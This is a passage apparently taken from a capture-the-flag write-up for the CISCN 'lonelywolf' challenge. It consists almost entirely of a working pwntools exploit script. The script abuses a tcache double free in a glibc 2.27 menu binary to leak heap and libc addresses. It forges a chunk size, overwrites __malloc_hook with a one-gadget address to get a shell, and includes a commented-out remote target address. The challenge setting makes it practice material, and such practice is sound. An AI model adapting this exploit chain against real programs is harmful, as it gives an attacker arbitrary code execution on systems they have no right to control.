ciscn_lonelywolf

lonelywolf

from pwn import *
# Local target setup: a 64-bit process started from ./pwn with verbose pwntools
# logging; libc symbol offsets used later come from the bundled libc-2.27.so.
context.arch = 'amd64'
context.log_level='debug'
p=process('./pwn')
libc=ELF('./libc-2.27.so')
#p=remote('124.71.235.219',25196)
def add(idx,size):
    """Select menu option 1 and answer the 'Index: ' and 'Size: ' prompts."""
    p.sendlineafter('Your choice: ', '1')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Size: ', str(size))

def edit(idx,content):
    """Select menu option 2, answer the 'Index: ' prompt, then send `content` as the reply to 'Content: '."""
    p.sendlineafter('Your choice: ', '2')
    p.sendlineafter('Index: ', str(idx))
    p.sendlineafter('Content: ', content)

def show(idx):
    """Select menu option 3 and answer the 'Index: ' prompt; the echoed output is left for the caller to read."""
    p.sendlineafter('Your choice: ', '3')
    p.sendlineafter('Index: ', str(idx))

def free(idx):
    """Select menu option 4 and answer the 'Index: ' prompt."""
    p.sendlineafter('Your choice: ', '4')
    p.sendlineafter('Index: ', str(idx))

# Interaction script, run top to bottom against the process opened above.
# Each step depends on the target's state after the previous one, so the call
# order is significant. The numeric offsets (0x260, 0x280, 0x3ebca0, 0x10a41c)
# are specific to this binary and its libc-2.27 build.
add(0,0x78)
# Slot 0 is freed twice, with an 8-byte edit of its contents in between.
for i in range(2):
    edit(0,'aaaaaaaa')
    free(0)
# show(0) echoes the slot's contents; the first 6 bytes are interpreted as a
# little-endian pointer and 0x260 is subtracted to derive heap_base.
show(0)
p.recvuntil('Content: ')
heap_base=u64(p.recv(6).ljust(8,b'\x00'))-0x260
log.success('heap_base :'+hex(heap_base))
# Three zero qwords followed by the value 0x451, written into a new 0x78 slot.
payload=p64(0)*3+p64(0x451)
add(0,0x78)
edit(0,payload)

# Ten further 0x68-byte allocations, all requested for slot 0.
for i in range(10):
    add(0,0x68)

# Same free/edit/free pattern as above; the final edit writes the heap address
# heap_base+0x280 followed by a zero qword.
free(0)
edit(0,b'p'*8)
free(0)
edit(0,p64(heap_base+0x280)+p64(0))
add(0,0x68)
add(0,0x68)
free(0)
show(0)
p.recvuntil('Content: ')
# Bytes echoed up to and including the first 0x7f byte are read as a pointer;
# the trailing comment records the __malloc_hook offset (0x3ebca0) in this build.
libc_base=u64(p.recvuntil('\x7f').ljust(8,b'\x00'))-96-0x10-libc.symbols['__malloc_hook']#0x3ebca0
log.success('libc_base:'+hex(libc_base))
malloc_hook=libc_base+libc.symbols['__malloc_hook']
# Free/edit/free once more with 0x70-byte slots: the edit after the second free
# writes the computed malloc_hook address, and the edit after the two adds
# writes libc_base+0x10a41c (a build-specific offset recorded only on this page).
add(0,0x70)
free(0)
edit(0,'p'*8)
free(0)
edit(0,p64(malloc_hook))
add(0,0x70)
add(0,0x70)
edit(0,p64(0x10a41c+libc_base))

# Uncomment to attach a debugger before the final allocation.
#gdb.attach(p)
add(0,0x10)
p.interactive()

 
